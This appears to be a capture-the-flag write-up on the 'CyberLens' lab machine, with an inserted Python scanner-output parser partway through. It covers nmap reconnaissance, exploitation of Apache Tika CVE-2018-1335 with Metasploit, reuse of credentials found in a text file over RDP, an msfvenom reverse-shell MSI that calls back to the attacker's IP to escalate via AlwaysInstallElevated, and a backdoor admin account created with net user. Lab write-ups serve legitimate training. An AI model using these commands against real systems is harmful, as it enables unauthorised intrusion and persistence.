CyberLens


Target IP: 10.10.253.84
Challenge Description:



Reconnaissance

Performing a SYN scan of every TCP port with the command sudo nmap -sS 10.10.253.84 -p- returns the result shown above. Several of the open ports are typical Windows services, which suggests the target machine is running Windows. Time to perform an aggressive scan against these open TCP ports to identify the services behind them.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV -A 10.10.253.84 -p 80,135,139,445,3389,5985,7680,47001-61777 
[sudo] password for kali: 
Starting Nmap 7.94 ( https://nmap.org ) at 2024-05-26 19:48 UTC
Nmap scan report for 10.10.253.84
Host is up (0.024s latency).
Not shown: 14767 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
80/tcp    open  http          Apache httpd 2.4.57 ((Win64))
|_http-server-header: Apache/2.4.57 (Win64)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: CyberLens: Unveiling the Hidden Matrix
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-05-26T19:50:20+00:00; +3s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: CYBERLENS
|   NetBIOS_Domain_Name: CYBERLENS
|   NetBIOS_Computer_Name: CYBERLENS
|   DNS_Domain_Name: CyberLens
|   DNS_Computer_Name: CyberLens
|   Product_Version: 10.0.17763
|_  System_Time: 2024-05-26T19:50:12+00:00
| ssl-cert: Subject: commonName=CyberLens
| Not valid before: 2024-05-25T19:44:34
|_Not valid after:  2024-11-24T19:44:34
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
7680/tcp  open  pando-pub?
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  msrpc         Microsoft Windows RPC
61777/tcp open  http          Jetty 8.y.z-SNAPSHOT
| http-methods: 
|_  Potentially risky methods: PUT
|_http-cors: HEAD GET
|_http-title: Site doesn't have a title (text/plain).
|_http-server-header: Jetty(8.y.z-SNAPSHOT)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94%E=4%D=5/26%OT=80%CT=47002%CU=36221%PV=Y%DS=2%DC=T%G=Y%TM=665
OS:39279%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=10B%TI=I%CI=I%II=I%SS=S
OS:%TS=U)SEQ(SP=105%GCD=1%ISR=10C%TI=I%CI=I%II=I%SS=S%TS=U)OPS(O1=M509NW8NN
OS:S%O2=M509NW8NNS%O3=M509NW8%O4=M509NW8NNS%O5=M509NW8NNS%O6=M509NNS)WIN(W1
OS:=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%DF=Y%T=80%W=FFFF%O
OS:=M509NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T
OS:=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=
OS:0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=
OS:Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=
OS:Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%R
OS:IPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)

Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2s, deviation: 0s, median: 2s
| smb2-time: 
|   date: 2024-05-26T19:50:16
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

TRACEROUTE (using port 56555/tcp)
HOP RTT      ADDRESS
1   23.39 ms 10.14.0.1
2   24.07 ms 10.10.253.84

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 85.90 seconds

I ran the command sudo nmap -sV -A 10.10.253.84 -p 80,135,139,445,3389,5985,7680,47001-61777 to perform an aggressive scan (version detection, OS detection and default scripts) against the open TCP ports and received the result shown above. The scan retrieves a lot of information, such as the applications running behind the different ports: SMB is open, and there are multiple web applications, including those on ports 80 and 61777. Time to identify the operating system name and version.
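Reading a scan like the one above by hand is fine for one host, but the same findings (risky HTTP methods, a snapshot build, SMB signing not required, RDP and WinRM exposed) are what a reviewer wants flagged automatically across many hosts. The following is an added example, not part of the original write-up or of Nmap: it parses Nmap's normal output into per-port records and host-level script results, then applies a small rule set. The SAMPLE_SCAN text is a constructed excerpt of the page's own scan output; the rules in assess() and their severity labels are this example's own assumptions.

```python
"""Parse Nmap normal output and flag the findings a reviewer would pull out of
a scan like the one above.

This is an added example, not part of the original write-up or of Nmap. The
SAMPLE_SCAN text is a constructed excerpt of the page's own nmap output; the
rules in assess() and their severities are this example's own assumptions.
"""
import re
from dataclasses import dataclass, field

# Constructed sample: a trimmed copy of the scan output shown above.
SAMPLE_SCAN = """\
PORT      STATE SERVICE       VERSION
80/tcp    open  http          Apache httpd 2.4.57 ((Win64))
|_http-server-header: Apache/2.4.57 (Win64)
| http-methods: 
|_  Potentially risky methods: TRACE
445/tcp   open  microsoft-ds?
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
61777/tcp open  http          Jetty 8.y.z-SNAPSHOT
| http-methods: 
|_  Potentially risky methods: PUT
|_http-server-header: Jetty(8.y.z-SNAPSHOT)

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
"""

# One "<port>/<proto>  <state>  <service>  <version>" row of the port table.
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


@dataclass
class Port:
    number: int
    proto: str
    state: str
    service: str
    version: str
    scripts: list = field(default_factory=list)   # NSE lines under this port


def parse_nmap(text):
    """Split Nmap normal output into per-port records and host-level NSE lines."""
    ports, host_scripts = [], []
    in_host_scripts = False
    for line in text.splitlines():
        if line.startswith("Host script results"):
            in_host_scripts = True
            continue
        m = PORT_RE.match(line)
        if m and not in_host_scripts:
            ports.append(Port(int(m.group(1)), m.group(2), m.group(3),
                              m.group(4), m.group(5).strip()))
        elif line.startswith("|"):
            body = line.lstrip("|_ ").rstrip()      # drop the NSE tree prefix
            if in_host_scripts or not ports:
                host_scripts.append(body)
            else:
                ports[-1].scripts.append(body)
    return ports, host_scripts


def assess(ports, host_scripts):
    """Return (severity, port, message) findings, most severe first.
    Severity labels are this example's own convention."""
    findings = []
    for p in ports:
        if p.state != "open":
            continue
        for s in p.scripts:
            if s.startswith("Potentially risky methods:"):
                for method in s.split(":", 1)[1].split():
                    sev = "high" if method in ("PUT", "DELETE") else "medium"
                    findings.append((sev, p.number, f"HTTP method {method} enabled"))
        if "SNAPSHOT" in p.version:
            findings.append(("medium", p.number, f"snapshot build exposed: {p.version}"))
        if p.number == 3389:
            findings.append(("medium", p.number, "RDP reachable from the scanning network"))
        if p.number == 5985:
            findings.append(("info", p.number, "WinRM over HTTP listening"))
    if any("signing enabled but not required" in s.lower() for s in host_scripts):
        findings.append(("high", 445, "SMB signing not required (NTLM relay exposure)"))
    rank = {"high": 0, "medium": 1, "info": 2}
    return sorted(findings, key=lambda f: (rank[f[0]], f[1]))


if __name__ == "__main__":
    ports, host = parse_nmap(SAMPLE_SCAN)
    for sev, port, msg in assess(ports, host):
        print(f"[{sev:6}] {port:>5}/tcp  {msg}")
```

On the sample above this yields six findings, with the two high-severity ones (SMB signing not required on 445, PUT enabled on the Jetty service on 61777) listed first. Feeding it the full output of nmap -oN works the same way, since the parser only keys on the port table rows and the "|"-prefixed script lines.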

┌──(kali㉿kali)-[~]
└─$ crackmapexec smb 10.10.253.84                       
SMB         10.10.253.84    445    CYBERLENS        [*] Windows 10.0 Build 17763 x64 (name:CYBERLENS) (domain:CyberLens) (signing:False) (SMBv1:False)

Running CrackMapExec with the command crackmapexec smb 10.10.253.84 shows that the target machine is running Windows 10.0 Build 17763 x64, as shown above. I performed further analysis but did not find anything else useful. Time to perform enumeration.


Enumeration

Port 61777: HTTP
On this port I notice that Apache Tika Server 1.17 is running. Does this application have any known vulnerabilities? Time to find out.

I searched for Apache Tika 1.17 Server exploit on Google and found the website above. It seems the application is vulnerable to command injection, as shown above. This vulnerability has the CVE id CVE-2018-1335. Since the target machine is running Windows and the application version falls within the affected range, Apache Tika 1.15 - 1.17 on Windows, I think I have found a vulnerability. Since this article was written by Rapid7, the Metasploit framework will contain a working exploit for this vulnerability. I also found this amazing website which goes into more depth about the vulnerability here. Time to test the exploit.


Exploitation

I ran the command msfconsole -q to fire up the Metasploit framework, as shown above. Then I searched for the string apache tika 1.17 to find available modules and found one. This exploit is located at exploit/windows/http/apache_tika_jp2_jscript, so I used the command use 0 to select this module, as shown above.

I checked the parameters of this exploit using the command show options. I noticed the parameters are the basic ones. I initialised three parameters, RHOSTS, RPORT and LHOST, as shown above. I used the commands set RHOSTS 10.10.253.84 to set the target, set RPORT 61777 to set the port of the application on the target machine, and set LHOST tun0 to catch the Meterpreter reverse shell connection on my machine at its default port. After initialising the parameters, I used the check command and identified that the target machine is vulnerable to this exploit. Time to exploit it.

I ran the command run to launch the exploit. After launching it, I obtained a Meterpreter reverse shell connection. Then I used the command shell to open a new shell on the target machine. Now I have a foothold on the target machine as the user cyberlens, as shown above.


Privilege Escalation

After landing a shell on the target machine, I tried to find possible users on it. I noticed there is a user called CyberLens. When checking this user's directories, I noticed an unusual directory named Management inside the Documents folder, as shown above. This Management folder contains a text file named CyberLens-Management.txt which seems to hold the credentials CyberLens:HackSmarter123, as shown above. From the earlier enumeration, RDP on port 3389 was open. Maybe I can RDP into the target machine using the new credentials?

And bingo! Now I have an RDP session on the target machine. To achieve this I used the tool xfreerdp with the command xfreerdp /u:CyberLens /p:'HackSmarter123' /v:10.10.253.84, as shown above.

I served winPEAS.bat to the target machine and ran it there. It reported that the AlwaysInstallElevated policy is enabled. With this policy set, Windows Installer runs any Microsoft Installer (MSI) package with elevated (SYSTEM) privileges no matter which user launches it, so any local user can reach administrator-level access. To gain administrator privileges on the target machine, I can create a malicious MSI file that gives me higher privileges :)

And bingo! Now I have an NT AUTHORITY\SYSTEM shell on the target machine, as shown above. To achieve this, I used the command msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.14.55.153 LPORT=8443 -a x64 --platform Windows -f msi -o evil.msi to generate a malicious MSI file. This MSI opens a reverse shell connection to my machine on port 8443 with elevated privileges. Then I started a listener on my machine on port 8443. Over on the target machine, I executed evil.msi, which I served from my Python HTTP server. At the moment I only have shell access. Time to add my own user with administrator privileges.

To add my new admin user on the target machine, I created a user called admin with the password Password123 using the command net user /add admin Password123. Then I added this user to the Administrators group using the command net localgroup administrators admin /add, as shown above. Time to RDP into the target machine as this new administrator user.

And bingo! I was able to RDP into the target machine as the new user admin using the command xfreerdp /u:admin /p:'Password123' /v:10.10.253.84, as shown above. This user belongs to the Administrators group too. Now I have administrator privileges with RDP access on the target machine. GG :)


Flags

The user flag is shown above.

The admin flag is shown above.